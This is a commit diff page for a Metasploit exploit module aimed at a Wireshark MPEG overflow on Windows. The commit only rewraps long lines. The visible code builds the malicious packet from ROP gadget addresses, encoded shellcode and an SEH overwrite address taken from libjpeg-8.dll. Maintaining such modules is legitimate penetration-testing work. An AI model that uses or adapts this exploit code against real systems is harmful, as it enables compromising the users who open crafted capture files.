Skip to content

Commit 2e76db0

Browse files
committed
Try to stick to the 100 columns per line rule
1 parent fd95d9e commit 2e76db0

File tree

1 file changed

+3
-2
lines changed

1 file changed

+3
-2
lines changed

modules/exploits/windows/misc/wireshark_mpeg_overflow.rb

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -111,7 +111,7 @@ def exploit
111111
packet << "\x6c\x7d\x37\x6c" # NOP RETN
112112
packet << "\x6c\x7d\x37\x6c" # NOP RETN
113113
packet << ropchain
114-
packet << payload.encoded # Shellcode
114+
packet << payload.encoded # Shellcode
115115
packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
116116

117117
# 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
@@ -125,7 +125,8 @@ def exploit
125125

126126
# When file is open with GUI interface. This is NSEH/SEH overwrite
127127
packet << make_nops(4) # nseh
128-
packet << "\x55\x59\x80\x6b" # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
128+
# seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
129+
packet << "\x55\x59\x80\x6b"
129130

130131
print_status("Preparing payload")
131132
filecontent = magic_header

0 commit comments

Comments
 (0)